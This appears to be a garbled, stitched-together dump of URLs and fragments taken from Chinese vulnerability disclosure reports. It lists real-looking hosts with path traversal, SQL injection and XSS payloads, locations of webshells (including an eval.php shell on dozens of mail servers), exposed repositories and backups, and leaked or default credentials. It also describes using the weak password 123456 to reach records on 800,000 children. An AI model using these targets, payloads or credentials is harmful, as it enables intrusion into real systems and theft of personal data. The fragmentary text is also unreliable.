http://139.210.101.102:8888/2013yangcai/Edit/editor/filemanager/browser/default/browser.html?Type=File&Connector=http://139.210.101.102:8888/2013yangcai/Edit/editor/filemanager/connectors/asp/connector.asp http://139.210.101.102:8888/2013yangcai/admin/admin_index.asp http://newsletter2.51cto.com/new/openStats.php?serial=5629&email=xxxxxxx@gmail.com https://**.**.**.**/gh0std4ncer/lizkebab,修改其 http://club.astro.sina.com.cn/ http://club.tech.sina.com.cn/ http://club.news.sina.com.cn/ http://club.life.sina.com.cn/ http://club.eladies.sina.com.cn/ http://club.history.sina.com.cn/ http://club.mil.news.sina.com.cn/ http://club.baby.sina.com.cn/ http://club.baby.sina.com.cn/ http://**.**.**.**/login.jsp,利用常用用户名和弱口令123456可获得一个有效账号,登陆后爬取所有用户名,再用爬取用户名和弱口令123456获得400多个账号,登陆后,可查看80多万儿童姓名、身份证号、照片、家庭住址,有些还包含银行卡号。 http://**.**.**.**/findPw/sendSelectMail.php?select=2 http://218.75.221.153:9090/eis/index.action http://218.75.221.153:8088/eis/index.action http://218.75.221.153:8088/eis/guige.jsp http://zabbix.haowu.com/zabbix http://183.56.132.135:50070 http://**.**.**.**/login.do http://**.**.**.**/login.do http://**.**.**.**/ http://**.**.**.**/login.do http://**.**.**.**/ http://**.**.**.**/ data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E https://meican.com/account/directlogin http://www.cmreltd.com:80/ www.cmreltd.com http://android.myapp.com/myapp/detail.htm?apkName=com.netschool.main.ui http://ns.huatu.com/nsapi/base/captcha/phone b4:8b:30 teacher.huatu.com/admin/edit.php?cid=2882 http://202.120.144.60:80 http://android.myapp.com/myapp/detail.htm?apkName=com.ht.exam http://jpkc.dhu.edu.cn/yysj1/bulletin.aspx?bid=24 http://in.iflytek.com/ChangePwd/ http://mq.vcooline.com:9200/_plugin/head/../../../../../../opt/nginx/conf/nginx.conf http://**.**.**.**/html/solution/success_case/2014/0903/82.html http://119.254.68.150 http://119.254.68.150//login_bj.jsp http://119.254.68.150//WEB-INF/classes/tiles-def.xml 
http://61.152.171.123:8888/hereditary_sharing/welcome/welcome.action http://techsupport.phicomm.com/products_ent_list.html https://www.xkzb.wang/ http://st.renren.com https://openscanner.cc/index https://121.201.28.146/ http://**.**.**.**/bugs/wooyun-2016-0181024,后来又发现延边州也存在这个未授权访问,因此就使用google进行搜索,inurl:/archive/login.jsp,发现如下系统 http://**.**.**.**/bugs/wooyun-2016-0181024 http://59.41.186.91:8007/chat/question/searchQuestion.action http://101.198.161.9搜了下下的是360的地址 http://**.**.**.**:9080/sportV2/ http://**.**.**.**:9080/pasweb/ http://**.**.**.**:9080/gaweb https://**.**.**.**:8880 http://**.**.**.**/HBRC_User/Public/login.html http://**.**.**.**/HBRC_Home/Resume/content/id/696200/code/233a.html url:http://**.**.**.**/HBRC_User/Resume/edit/id/701120.html http://**.**.**.**/bugs/wooyun-2016-0167905 urn:getUserOrgList SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:xsd="http://**.**.**.**/1999/XMLSchema xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance xmlns:m0="http://**.**.**.**/ xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/ xmlns:urn="http://user.webservice.turbomail SOAP-ENV:Header/ SOAP-ENV:Body urn:getUserOrgList urn:apiName urn:apiName urn:apiPassword urn:apiPassword urn:userName urn:userName urn:domain urn:domain urn:resultType urn:resultType urn:getUserOrgList SOAP-ENV:Body SOAP-ENV:Envelope http://**.**.**.**/bugs/wooyun-2010-0174305 http://**.**.**.**/mailmain?type=getmd5sid1&username=postmaster&domain=root http://**.**.**.**/mailmain?type=login&uid=postmaster&domain=root&md5sid=9946d95d95ab011fbb1836378335e2f9 http://**.**.**.**/bugs/wooyun-2010-0176317 http://220.181.29.155:9333 http://192.168.52.69/admin/authc/loginpage?AUTHC_SUCCESS_TO_REDIRECT=%2Fadmin%2Fprojectshow http://**.**.**.**/ http://**.**.**.**:8888/manage http://**.**.**.**:8888/script encap:Ethernet fe51:f8/64 Scope:Link 
http://www.8477.com/e/class/sendnumber.php?a=review_dl&callback=jQuery183020776667445898056_1457193791259&id=1 http://www.8477.com/e/tags/index.php?page=1&tagname=%E7%8E%8B%E8%80%85%E8%8D%A3%E8%80%80&line=10 http://www.8477.com/e/tags/index.php?page=1&tagname=%E7%8E%8B%E8%80%85%E8%8D%A3%E8%80%80&line=10&tempid=15 https://github.com/myhongkongzhen/pro-module-zzwu/blob/e5db398b333bf3de43165c88150802a066eab147/demo-activemq/demo-avtivemq-consumer/src/main/resources/mail.properties url:http://www.cnoocengineering.com/manage/login.aspx http://www.cnoocengineering.com/manage/upload_file.aspx http://www.cnoocengineering.com/UploadFile/201636/TYTCJSM201636.aspx http://202.69.27.130:8080/ www.jxnews.com.cn https://117.40.143.160:8880/ http://**.**.**.**/fabu/41667.jhtml http://**.**.**.**/ http://**.**.**.**/news/13471 http://**.**.**.**/GIIS/Account/Login.aspx,登陆处无限制,用弱口令123456获得10个账号。 http://**.**.**.**:9020/netrep/index.jsp http://**.**.**.**:9020/console/ http://**.**.**.**:9020/shuaige/whoami.jsp http://**.**.**.**/news_list.php?i=....”,使用sqlmap验证。(注意:使用base64encode.py作为tamper) http://**.**.**.**/news_list.php?i= http://**.**.**.**/news_list.php?i= http://**.**.**.**/news_list.php?i= http://**.**.**.**/news_list.php?i= http://jders.midea.com.cn/ http://jders.midea.com.cn:8001/ERSService.asmx?WSDL http://tempuri.org/searchUsers http://task.www.sogou.com http://task.www.sogou.com/monitorresult?search_name=&search_id=1&tasksubmit=true http://s.shouji.sogou.com/sogouOemAdmin/fradminnew/index.jsp http://s.shouji.sogou.com/sogouOemAdmin/oemadmin/index.jsp http://s.shouji.sogou.com http://202.104.30.185/fckeditor/editor/fckeditor.html http://202.104.30.185//UserFiles/Image/yjh.jsp http://group.laiyifen.com/index.php/article-gonggao-lists-1*-2.html http://wx.rrkd.cn http://60.13.13.239:8080/yyoa/ url:http://**.**.**.**/service url:http://**.**.**.**/web/login.html http://**.**.**.**/web/upload/file/20160308/98106aa7-af55-448e-9106-b55f413872a9.asp 
url:http://**.**.**.**/hyweb/WEB/ http://www.dfzq.com.cn/dfzq.rar jdbc:oracle:thin:@**.**.**.**:1521:hr user:chis_2015 df.tc/0zprGp site:renren.com inurl:sid http://3g.renren.com/home.do?sid=V6lNussTlH_2H-l6UimfaZ&bm=316589623_fcbfca64832f541115d682a76fd7536b_1415165048956&f=1 site:3g.renren.com http://3g.renren.com/home.do?from=9508001&sid=7johVoa59YO6RIlPerk5lZ&bm=437025963_40143d4e770812d812261a4a4b6ad530_1411564082922 http://**.**.**.**:8880/ http://**.**.**.** http://survey.ifeng.com/resultjson.php?surveyId=123 www.tonghuafund.com/ http://android.myapp.com/myapp/detail.htm?apkName=com.tlb http://bomeibian.koudai.com/j_spring_security_check http://115.236.70.108:8000/explore/projects localhost:8888 jdbc:mysql://115.236.70.108:3399/englishbreak alhost:8888***** jdbc:mysql://101.201.148.79:3306/englishbreak http://www.12301.cc/ http://www.12301.cc/buyProduct.html,可看到已买到的产品。这里以百度糯米网账号为例,可看到已支付但未使用的订单,可根据订单号、取票人手机以及凭证号从而使用别人的订单(简直是免费蹭吃蹭喝蹭玩啊。。。) http://**.**.**/resweb/logon.jsp http://**.**.**/bea_wls_internal/wooyun.jsp jdbc:oracle:thin:@192.168.7.15:1521:orcl http://**.**.**.**/bugs/wooyun-2015-0145311 http://**.**.**.**/manager/user.do?method=toFindPwd http://**.**.**.**/MemberCenter/certification/toCertification http://**.**.**.**/MemberCenter/home/domainNameResolutionHtml?domainName=**.**.**.** jdbc:db2://localhost:50000/jdc_rzx jdbc:db2://LOCALHOST:50000/JDC_RZX http://**.**.**.**/Login.aspx http://**.**.**.**:84/ http://www.laiyifen.com/index.php/article*-zhifufangshi*_huodaofukuan*-lists*-11**.html https://bbc.ztgame.com:8443/j_acegi_security_ch http://sqlmap.org jdbc:oracle:thin:@**.**.**.**:1521:hbboss http://**.**.**.**/webtool/ http://220.181.155.26:8080//././././././././././././././././././././././././../../../../../../../../etc/passwd http://220.181.155.26:8080/etc/passwd http://220.181.155.26:8080/etc/hosts http://119.167.145.109/.bash_history 
http://10.106.8.91/cgi-bin/src_oss_download.py?filename=000002010056CE741B-5A83CD2BDD518A673D0A27D43A0A391F-5A83CD2BDD518A.mp4 oss://yk-source/000002010056CE741B-5A83CD2BDD518A673D0A27D43A0A39 oss://yk-source/000002010056CE741B-5A83CD2BDD518A673D0A27D43A0A391F-5A83CD2BDD518A.mp4 http://101.251.214.139/zmw/index.jsp http://**.**.**.**:8220/ http://**.**.**.**/bms-web/login.html jdbc:oracle:thin:@**.**.**.**:1521/house http://**.**.**/index.php/sale/popedom/login/symbol/crd/default.shtml pwd:wooyun http://**.**.**/index.php/accept/index/view/id/81335/p/1/Status/1/type/waitorder/self/0/symbol/1/default.shtml http://deskadmin.cctv.com/ https://**.**.**/_ https://**.**.**/_ https://**.**.**/script_ com:netop/tingyun-***** com:netop/tingy***** com:netop/tingy***** com:netop/tingy***** http://**.**.**/bugs/wooyun-2016-0179640_ http://**.**.**/_ http://**.**.**/script_ http://vendorcms.ws.netease.com/login.jsp http://58.252.101.21/shouce.jsp http://58.252.101.21/tunnel.jsp http://ebiz.tpi.cntaiping.com/TPEBizWeb/FCKeditor//editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://ebiz.tpi.cntaiping.com/TPEBizWeb/UserFiles/Image/data.jsp jdbc:oracle:thin:@192.168.33.203:1521:tpebnew jdbc:oracle:thin:@10.0.96.33:1521:ywdev jdbc:oracle:thin:@10.0.96.33:1521:ywdev http://**.**.**.**/html/solution/success_case/2014/0903/82.html http://**.**.**.**/bugs/wooyun-2010-0146493 file://进行过滤,可能会导致一些安全问题。但是就这样只能执行一些简单的程序,很鸡肋,但只要结合闪电邮的另一个缺陷就能实现真正的命令执行。 http://srm.changhong.com http://srm.changhong.com:8082/srm/core/admin/user.do?_act=popDialog&propertyId=receiveUsersSplit&search_userType=sysuser https://mdm.haidilao.com/mdm/admin/authenticate.do https://103.240.244.6/mdm/f.jsp?z0=utf-8 http://www.laiyifen.com/memadmin/index.php http://222.136.71.26/web/xxfbgetfile.jsp?code=system&fileid=ff1602161517246259&filename=-1 https://github.com/mGoogle/LearnGit/blob/231c93d5304c34f45815d76eb1d41808c8a7a1ec/account.txt 
http://fuwu.sf-express.com/service/delivery/onRoad/922767843716/true http://fuwu.sf-express.com/service/delivery/signed/662924641066/true http://**.**.**.**:7001 http://**.**.**/live800/loginAction.jspcompanyLoginName=1&loginName=a111&password=111 http://bloom.newsmth.net/.svn/entries http://bbs.wan.58.com/uc_server/admin.php?sid=279dCl4qLSDlnm5ZAMOUv%2BnSGzYhbr8qMKvYDm1Jnmd32OfGlQRFcKs4gBM7doceOVP6edWh7iunAw http://www.suo1.cn/site/list.php?id=41 http://www.suo1.cn/inc/tmpukzmf.php http://www.suo1.cn/inc/1.php http://**.**.**.**/bugs/wooyun-2016-0177673 http://125.77.22.157/Module/Main.aspx http://sysadmin.v3.tvmining.com/tsysadmin http://cloudcenter.tvmining.com/tmcloudcenter/ http://**.**.**/live800/loginAction.jspcompanyLoginName=1%s&loginName=a111&password=111 https://github.com/ZXvivian/person_python_tool/blob/75516328d98d7c174b88e9d927962869e4f51bbf/email_metrics.py http://tong.duowan.com/login.php http://house.focus.cn/community/xiangshuwan/khlist.php?id=2 https://112.91.183.230/login http://119.254.111.96/.svn/entries http://album.kuwo.cn/album/c/mphotow?aid=2078300*&pid=5901124&uid=21259663 http://**.**.**/uac/web3/jsp/login/login.jsp http://www.godsgive.com/ zhanghao:westroad11 mima:love1107 http://180.153.108.177:8080/pos/ http://sup.yungouos.com/index.action https://task.sprucetec.com/login.jsp http://share.kuwo.cn/p/web/AjaxGetLeboByLabpn=1&labName=%E5%98%BB%E5%93%88*&order=desc http://share.kuwo.cn/p/web/AjaxGetLeboByLab?pn=1&labName=%E5%98%BB%E5%93%88*&order=desc https://www.beijing.com.cn/pages/stage/web/Declaration%20letter.jsp pay.yizhifubj.com/merchant/login.jsp https://www.yizhifubj.com/resources/2016-03-12/bc648818-c087-4199-be1d-ecfd766763ea.jsp https://mentry.bocichina.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://180.153.25.1/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://180.153.25.1:8080/web.zip http://222.73.243.39/cacti 
http://business.yeahka.com/o2o/user_shop/search_new.do?page=0&pageSize=20&time=20160312120334&adv_abled=2&x=121.040875&y=31.611332 http://id.ceair.com:7777/idmsso/login.jsp http://id.ceair.com:7777/ http://id.ceair.com:7777/manual/ http://id.ceair.com:7777/sysadmin/ http://id.ceair.com:7777/idmsso/login.jsp http://id.ceair.com:7777/iamsso/login.jsp http://id.ceair.com:7777/idmsso/ http://id.ceair.com:7777/idmsso/页面截图如下: com:7777 http://id.ceair.com:7777 http://123.103.10.175/zabbix/ http://api.g.sdo.com/game/getGameDetail?ticket=RNK76Qw9Qh8zy%2B4oa5PTieFNtofwLNzUldQEGxF8f2z%2BMPAywNLzdDsD5BuZriM%2BM9TPUlqvIpyLHsewQ%2F%2F0392HIOH60xFN2wr0DZGkqWk%3D&os=2%20and%201=1&netflag=WIFI&OperationSystem=ios&gameid=9999111&UserId=&v=2.0&version=i.6.1.0&OperationLocalTime=2016-03-12%2020%3A17%3A38&OperationVersion=9.2.1 http://oa.xywy.com/ http://119.90.59.90/index.html https://buy.cnooc.com.cn/cbjywebframe/.svn/entries https://buy.cnooc.com.cn/cbjyweb/.svn/entries https://buy.cnooc.com.cn/cbjylogin/.svn/entries http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://zhaopin.cnooc.com.cn http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute http://cctv.cnooc.com.cn/axis2-admin http://60.22.141.6:7001/maximo/webclient/login/login.jsp http://60.22.141.6:7001/bea_wls_internal/wooyun.jsp http://**.**.**/ https://github.com/qingmoyao/cashLoad-20150930/blob/7fa8e9bc7b6aa8ce3d7b3cfcf96b7280f3794b6e/xposp-service/src/main/profiles/dev/serviceContext.xml http://api.m.koudai.com http://i.auto.ifeng.com/index.php?c=yidianzixun&a=yidianhtml&type=cms&id=1052538 
http://uc.audi.cn/ D93C9E2F72CEC3118EB6D563935343A3:FG=1 http://www.cnoocengineering.com/single.aspx?column_id=10454 http://api.m.xywy.com/api/?m=Askintegral&act=apply&appname=ask&edition=4.3&model=1&sign=3f36f776d163c6b6c74b1adfdc1b41db http://tclkt.etoway.cn/ http://tclkt.etoway.cn/ca/ma3.jsp?o=vLogin jdbc:oracle:thin:@172.16.103.16:1521:rdcms jdbc:oracle:thin:@172.16.103.16:1521:rdcms http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom http://**.**.**/web/index.action_ http://sms.api.xiaoenai.com/v3/sms/client_verify_code http://game.feng.com/index.php?r=apiw/apiGiftBag/getNewGiftBagNum http://zb.hupu.com/search?s=%22%20OR%207838=7848%20AND%20%22Fsxo%22=%22Fsxo http://zb.hupu.com/search?s=%22%20OR%207838=7838%20AND%20%22Fsxo%22=%22Fsxo http://logs.51cto.com/rizhi2&pageurl=http%3A//network.51cto.com/&referer=http%3A//developer.51cto.com/art/201505/475552.htm&language=zh-CN&color=24&screensize=1280*800&debug=undefined&firsttime=116-3-14-9-55-50&lasttime=116-3-14-9-55-50&type=1&charset=GBK&timezone=-8&return1=1 http://network.51cto.com/ http://office.focus.cn/group/photo_search.php?group_id=80000&page=1&search_area=thesite&search_str=&search_type=picname&submit=%cb%d1%cb%f7%cd%bc%c6%ac http://**.**.**/portal user:weblogic pwd:weblogic http://**.**.**/whoami/whoami.jsp jdbc:oracle:thin:@172.16.18.108:1521:ievsp password:bpm http://admin.joygossip.joy.cn/user/user_index#_blank http://**.**.**/p/mb/GetContentpage=1&start=1&from=pc&id=123&mbuid=53036358 http://app.art.ifeng.com/?app=system&controller=fall&action=freelist_page&flid=1*&jsoncallback=jsonp1457941973953&page=2&_=1457941977376 http://**.**.**/_ http://**.**.**/_searchpreety_ http://**.**.**/_plugin/head/_ www.chinahr.com/tia***** http://cms.caohua.com/Member/Register.aspx http://www.caohua.com/game.html http://www.caohua.com/soulb http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m= 
http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx http://**.**.**.**/ane56os/backuser/login http://118.145.26.196/zabbix/index.php https://112.124.8.165:5887/orders/orders_list.jsp# http://121.199.10.19:8322/images/authorizeImg/liubin1.jpg http://**.**.**.**/kitty/?page=Download http://qar.csair.com/mc/login.jsp http://www.nbopen.com.cn:80/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 www.nbopen.com.cn http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1* http://**.**.**.**/housing/help.jspx jdbc:oracle:thin:@**.**.**.**:1524/houseys jdbc:oracle:thin:@**.**.**.**:1521/house jdbc:oracle:thin:@**.**.**.**:1522/house jdbc:oracle:thin:@**.**.**.**:1525/housewy https://work.gongchang.com https://work.gongchang.com/account/login/findPassword?gct=6.0.2-1.3 URL:http://**.**.**.**/review/detail.php?program=r_french&id=209 http://**.**.**/_searchpreety_ http://**.**.**/_plugin/head/_ http://**.**.**/_plugin/sql/_ http://**.**.**.**:80 http://2014beijing.geely.com/2014beijing.tar.gz http://2014beijing.geely.com/bocadmin/index.php?login http://global.geely.com/favicon.ico/a.php http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343 http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343 jiazhuo:jz$61088 https://**.**.**/articlelist.pagetype_id=08 https://**.**.**/articlelist.pagetype_id=08 http://**.**.**/articlelist.pagetype_id=20 http://**.**.**/articlelist.pagetype_id=04&type_flg=xwgg_ http://**.**.**/articlelist.pagetype_id=07_ http://**.**.**/articlelist.pagetype_id=07_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_ http://**.**.**/articlelist.pagetype_id=05&type_flg_ http://**.**.**/articlelist.pagetype_id=01&type_flg=lcgl_ http://**.**.**/articlelist.pagetype_id=08_ 
http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articleview.pagearticle_id=269A21DB047D7DC5E050007F01007743&type_id=20&type_flg_ http://**.**.**/articleview.pagearticle_id=0102dd03-dc4b-11e5-9991-40f2e9d8c09a&type_id=04&type_flg=xwgg_ http://**.**.**/articleview.pagearticle_id=7e299055e72b11e5a8b440f2e92e2622&type_id=03_ http://**.**.**/articleview.pagearticle_id=b33cfe94-7e7a-11e4-a50f-40f2e99cef5a&type_id=07&type_flg_ http://**.**.**/articleview.pagearticleId=851eeb1d-a6f9-11e5-979e-00163e0024e9&type_id=10&type_flg=0&index=3&contentId=851eeb1d-a6f9-11e5-979e-00163e0024e9&contentType=10&type=2_ http://**.**.**/articleview.pagearticle_id=c4c39d5d-85c3-11e4-912a-94de80cbc04c&type_id=06&type_flg=lcgl_ http://**.**.**/articleview.pagearticleId=88399c9c-b4db-11e5-884f-1051721b3c39&type_id=10&type_flg=0&index=3&contentId=88399c9c-b4db-11e5-884f-1051721b3c39&contentType=10&type=2_ http://**.**.**/articleview.pagearticle_id=01833ea8-2549-11e5-9a92-00163e000e7b&type_id=08&type_flg_ http://**.**.**/articleview.pagearticle_id=89944d3b-7ba4-11e5-9838-1051721d3b60&type_id=01&type_flg=lcgl_ http://**.**.**/articleview.pagearticle_id=a831146b-e697-11e5-ba53-288023a0e8b4&type_id=08&type_flg_ http://**.**.**/ https://xxxx/ http://cs.gamebar.com/faq.php?id=1 http://train.guosen.com.cn:8080使用的是新为软件E-learning系统,恰好前不久写了这个插件,于是直接尝试居然直接命中 http://api.5211game.com/YYMEPassport/Simulator http://**.**.**/_ cast:192.168.3.255***** fe7f:2c***** dropped:0***** http://**.**.**.**:7003/ http://**.**.**.**:7003/cas/re.jsp https://github.com/search?utf8=%E2%9C%93&q=mail.rong360.com&type=Code&ref=searchresults jdbc:oracle:thin:@**.**.**.**:1521/house http://api.b.360.cn/.git https://**.**.**.**:1443,拿出神器立马xxoo返回一个shell https://vpn.renren-inc.com/dana-na/auth/url_default/welcome.cgi http://www.juntu.com http://211.100.75.190/user/admin http://**.**.**.**/ http://**.**.**.**/jyjg/list_32.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ 
http://**.**.**.**/ http://wifi.shengcaijinrong.com/Accountcenter/accountmiddle www.csairshop.com http://211.100.44.243/ http://**.**.**/_ http://**.**.**/loginfrom=%2F_ http://userreport.yulong.com/usercontrol.php http://webmail.now.cn/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://mail.shtchem.com/up/UploadTemp/eval.php http://mail.jinling.com/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.szfine.com/up/UploadTemp/eval.php http://webmail.zhicheng-holdings.com/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://webmail.mvl.hk/up/UploadTemp/eval.php http://mail.milliondollarbaby.com.cn/up/UploadTemp/eval.php http://webmail.zhdvt.com/up/UploadTemp/eval.php http://mx622.now.net.cn/up/UploadTemp/eval.php http://mail.hamilsonjewelry.com/up/UploadTemp/eval.php http://mail.gofeng.hk/up/UploadTemp/eval.php http://103.242.101.180/up/UploadTemp/eval.php http://mail.longoent.com/up/UploadTemp/eval.php http://mail.echidu.com/up/UploadTemp/eval.php http://webmail.arcplan.com.cn/up/UploadTemp/eval.php http://mail.cissst.com/up/UploadTemp/eval.php http://pop.lhgltd.com/up/UploadTemp/eval.php http://mail.chineseinflatables.cn/up/UploadTemp/eval.php http://103.242.101.222/up/UploadTemp/eval.php http://103.242.101.157/up/UploadTemp/eval.php http://mail.fuhong.org.mo/up/UploadTemp/eval.php http://mail.apec-pcb.com/up/UploadTemp/eval.php http://mail.radiobuoy.net/up/UploadTemp/eval.php http://mail.hanminghy.com/up/UploadTemp/eval.php http://mail.shtchem.com/up/UploadTemp/eval.php http://mail.ap-trade.net/up/UploadTemp/eval.php http://103.242.101.192/up/UploadTemp/eval.php http://mail.uptowntradingco.com/up/UploadTemp/eval.php http://pop.kongfung.com.cn/up/UploadTemp/eval.php http://mail.fellowes-ic.com/up/UploadTemp/eval.php http://mail.gd-xinjiye.com/up/UploadTemp/eval.php http://mail.ntcz.cc/up/UploadTemp/eval.php 
http://pop.hjglassware.com/up/UploadTemp/eval.php http://59.38.124.22/up/UploadTemp/eval.php http://59.38.124.3/up/UploadTemp/eval.php http://mail.uci-holdings.com.hk/up/UploadTemp/eval.php http://mail.ccon.com.cn/up/UploadTemp/eval.php http://mx603.now.net.cn/up/UploadTemp/eval.php http://mail.joinway.com/up/UploadTemp/eval.php http://mail.shuziguigu.com/up/UploadTemp/eval.php http://mail.mythunder.com.cn/up/UploadTemp/eval.php http://mail.khtship.com/up/UploadTemp/eval.php http://mail.newsea.cn/up/UploadTemp/eval.php http://mail.zhgxjs.com/up/UploadTemp/eval.php http://59.38.124.4/up/UploadTemp/eval.php http://mail.zjpxzx.com/up/UploadTemp/eval.php http://59.38.124.3:88/up/UploadTemp/eval.php http://mail.cn-mst.com/up/UploadTemp/eval.php http://pop.hjglassware.com/up/UploadTemp/eval.php http://mail.seastar-tech.com/up/UploadTemp/eval.php http://mail.howata.com/up/UploadTemp/eval.php http://mail.xjhuaao.com/up/UploadTemp/eval.php http://mx606.now.net.cn/up/UploadTemp/eval.php http://pop.kongfung.com.cn/up/UploadTemp/eval.php http://mail.ccon.com.cn/up/UploadTemp/eval.php http://mail.joinway.com/up/UploadTemp/eval.php http://mail.newsea.cn/up/UploadTemp/eval.php http://webmail.arcplan.com.cn/up/UploadTemp/eval.php http://mail.zjpxzx.com/up/UploadTemp/eval.php http://mail.fellowes-ic.com/up/UploadTemp/eval.php http://mail.mythunder.com.cn/up/UploadTemp/eval.php http://mail.gd-xinjiye.com/up/UploadTemp/eval.php http://mail.echidu.com/up/UploadTemp/eval.php http://mail.zhgxjs.com/up/UploadTemp/eval.php http://mail.uci-holdings.com.hk/up/UploadTemp/eval.php http://mail.ntcz.cc/up/UploadTemp/eval.php http://mail.shuziguigu.com/up/UploadTemp/eval.php http://pop.lhgltd.com/up/UploadTemp/eval.php http://webmail.sbtoy.com/up/UploadTemp/eval.php http://mail.sxpfw.gov.cn/up/UploadTemp/eval.php http://webmail.zhtally.cn/up/UploadTemp/eval.php http://mail.cisi.hk/up/UploadTemp/eval.php http://mail.fuhong.org.mo/up/UploadTemp/eval.php 
http://mail.apec-pcb.com/up/UploadTemp/eval.php http://mail.radiobuoy.net/up/UploadTemp/eval.php http://webmail.mvl.hk/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://webmail.zhdvt.com/up/UploadTemp/eval.php http://mail.cisi.hk/up/UploadTemp/eval.php http://mail.fuhong.org.mo/up/UploadTemp/eval.php http://mail.apec-pcb.com/up/UploadTemp/eval.php http://mail.radiobuoy.net/up/UploadTemp/eval.php http://webmail.mvl.hk/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://webmail.zhdvt.com/up/UploadTemp/eval.php http://yimin.edai.com/news.php?classid=3 http://211.137.182.86:8083/report/ http://e.cheyipai.com/WebController/LogInManage/Index重置密码 http://expo.cfw.cn/zhlist.aspx?year=0&month=0&hy=1&pg=1 http://**.**.**.**/ http://xiaojiadianvideo.asia/a/member.php?kobj_mb_id=82801549 http://api.sina.cn/sinago/register.json?uid=8cbb26e31cdf061e&from=6049395012&wm=b207&oldchwm=14020_0001&chwm=14020_0001&imei=A0000055919C95 http://mail.haolyy.com:8008/Index/Login http://mail.haolyy.com:8008/ http://58.251.33.183:8080/ http://58.251.33.183:8080/zecmd/zecmd.jsp https://58.251.33.183/ http://www.edingtou.com/member/common/lookforpwd.html https://**.**.**.**/exploits/39241/ http://www.xmairhotels.com/admin/ImageShow.asp?imgKey=20100119155428 http://bcy.net/coser/detail/69057/489203 http://**.**.**.**/w2/index.jsp http://**.**.**.**/wap/index.do http://open.chinaums.com:5811/采用的时ecmall,查看了下相关的插件。发现基本都没有成功,然后自己手工查看了下,居然是部署有waf http://mapi.cheyipai.com//Order/GetBidHistoryList?businessid=308330&onlineId=c16af131-36f1-4d8f-95a7-fdd777825f1a&aucRootTag=0&pageIndex=1&pageSize=10&version=4.0.8&clienttype=1&markTime=0&searchTxt=1&memberCode=US015183&ip=192.168.137.2&imei=72A567F4-48FE-4353-953F-176F185149D6 https://**.**.**.**/directBank/login/forgetPassword.do?bankCode=3004 http://**.**.**.**/robots.txt%00.php 
http://180.168.192.22:10000/bak/),存在Jboss反序列化漏洞 https://mybank.jsbchina.cn/pweb/static/index.html#/mainView/LoginPasswordReset/mod___nav=1&sec=1&navIndex=6 http://118.186.245.72/index/contents.action http://112.64.185.236:9090/home.jsp https://**.**.**.**/desktop/index.html#/main/RetrievePassword/mod$inTrs http://bcy.net/coser/editpost/68992/489501 http://test.wap.frbao.com:8181/sys/login.action http://test.wap.frbao.com:8181/k8cmd.jsp http://www.fenqile.com/user/forget_pwd.html https://misc.douban.com/vpn/douban-vpn.html http://openid2.dapps.douban.com/server/endpoint/?openid.assoc_handle=%7BHMAC-SHA1%7D%7B56ea9af3%7D%7BtbWH9A%3D%3D%7D&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.realm=http%3A%2F%2Felearning.intra.douban.com&openid.return_to=http%3A%2F%2Felearning.intra.douban.com%2F_dae%2Flogin%2Fverify%2F%3Fcontinue%3Dhttp%253A%252F%252Felearning.intra.douban.com%252Flesson%252F%26janrain_nonce%3D2016-03-18T12%253A23%253A37ZijUOUU&openid.sreg.optional=username%2Cuid&openid.sreg.required=email%2Cgroups http://220.248.19.22:80/ http://220.248.19.21:8088/ http://211.95.2.35/ http://**.**.**.**/w3g/app/18291094.html http://bcy.net/article/new http://bcy.net http://deskadmin.cctv.com test123:test123 http://jira.bltech.cn/general/score/flow/scoredate/result.php?FLOW_ID=%bf%27%20 http://house.19lou.com/newhouse-house-1&area=0&name=&price=0&houseType=0&homeType=%E5%A4%8D%E5%BC%8F%E5%AE%A4* 